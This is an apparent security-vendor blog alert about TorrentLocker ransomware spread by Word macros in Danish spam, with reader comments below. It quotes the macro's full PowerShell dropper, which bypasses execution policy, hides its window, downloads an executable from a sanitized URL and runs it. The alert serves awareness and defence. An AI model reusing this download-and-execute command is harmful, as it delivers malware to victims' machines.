Two large spam waves swept across Denmark in the past 5 days. Both carry the notorious TorrentLocker ransomware and feature a few new tricks.

Oblivious users are misled into opening a Microsoft Word document in which cybercriminals embedded a malicious macro.

If the victim enables the macro by clicking on “Enable Editing”, a PowerShell code will be executed and it will download ransomware from the TorrentLocker family.

torrentlocker malicious document

The encrypting malware is downloaded via HTTP GET via the following URL (sanitized for your protection):

* .js2-Order [.] Pl / file / set.rte

This is the complete power shellcode (sanitized for your protection):

C: \ Windows \ System32 \ Windows PowerShell \ v1.0 \ PowerShell.exe PowerShell.exe -ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden (New-Object SYSTEm.nEt.wEBCLIent) .DWnlOAdFILE ( ‘http: //48f4339.js2-order [.] Pl / file / set.rte ‘,’ C: \ Users \ [% user profile%] \ AppData \ Roaming.EXE ‘); Start-process ‘C: \ Users \ [% user profile%] \ AppData \ Roaming .exe’.

TorrentLocker immediately injects itself in the explorer.exe process.

This new TorrentLocker variant features a couple of new features:

  • it harvests usernames and passwords from the infected computer
  • and it can spread to other computers through shared files.

Antivirus detection is still low: 3/55 on VirusTotal.

virustotal detection rates - february 28 2017

These spam waves are very aggressive, so please be extra cautious with protecting your inbox and carefully evaluate which emails you open. A similar spam wave spreading TorrentLocker as well still achieves a rather low detection rate, even 4 days after it was discovered: 19/56 on VirusTotal.

There is a tool that can decrypt data locked by some TorrentLocker variants, but it has not been tested on this new variant yet.

Our complete guide to email security might help. Also, make sure you check all the protection measured in this anti-ransomware plan.

Stay safe!

*This article features cyber intelligence provided by CSIS Security Group researchers.

These Free Ransomware Decryption Tools Are Your Key to Freedom [Updated 2023]

Ransomware Explained. What It Is and How It Works


You overwrote your “What is ransomware and 15 easy steps.” Please repost. It is a great summary article for cyber education.

Hi Jim! Thank you for noticing and for the kind feedback! We fixed the issue.

Frederik Bechmann on March 21, 2017 at 11:50 am

Hi Andra,

Very relevant post!

Being from Denmark, I’ve seen a lot of these scam mails at close hand (and of course, I’ve warned our customers).

Best regards,

It’s good to hear you found the alert useful, Frederik!

That my comment, “is awaiting moderation” does not instill me with a great deal of confidence. I get the same message whenever I disagree with someone who is an obvious idiot on our national news service, the renowned CBC, the last great bastion of hypocracy and feeble polemic in NA. God save us from marketeers and our own ignorance.

Hi Charles,

I’m not sure what you were looking to achieve here. There is plenty of information about the product on our website and we do reply and approve comments, but we also have weekends. For urgent matters, our support email address is always available and we’re also active on Facebook, Twitter, Instagram, LinkedIn and Google+, so there is no shortage of ways to reach us.

You other comments were not approved because of the language and the way you chose your express your opinions.

Heimdal seems to offer little but “freeware’ which is often outdated and/or unsupported by its originators, at least to my brief exploration. Are you just a reseller of alpha tech that may or may not be worth a look-at? And then offer “up-dates” to same crap-ware to line your pockets. Not like it does’t happen, but some truth would be refreshing

I also got this today, with different sender ( henriette.nielsen@pakkepost ) and different attachment ( 363772.doc )

Leave a Reply

Your email address will not be published. Required fields are marked *